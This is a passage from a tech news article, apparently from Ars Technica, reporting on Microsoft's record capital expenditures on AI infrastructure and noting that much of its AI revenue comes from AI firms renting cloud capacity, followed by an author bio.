Despite these struggles, Microsoft continues to spend heavily on AI infrastructure. The company reported capital expenditures of $34.9 billion for its fiscal first quarter ending in October, a record, and warned that spending would rise further. The Information notes that much of Microsoft’s AI revenue comes from AI companies themselves renting cloud infrastructure rather than from traditional enterprises adopting AI tools for their own operations.
For now, as all eyes focus on a potential bubble in the AI market, Microsoft seems to be building infrastructure for a revolution that many enterprises haven’t yet signed up for.
Benj Edwards is Ars Technica's Senior AI Reporter and founder of the site's dedicated AI beat in 2022. He's also a tech historian with almost two decades of experience. In his free time, he writes and records music, collects vintage computers, and enjoys nature. He lives in Raleigh, NC.
Comments
With an account on the Fediverse or Mastodon, you can respond to this post . Since Mastodon is decentralized, you can use your existing account hosted by another Mastodon server or compatible platform if you don't have an account on this one. Known non-private replies are displayed below.
Learn how this is implemented here .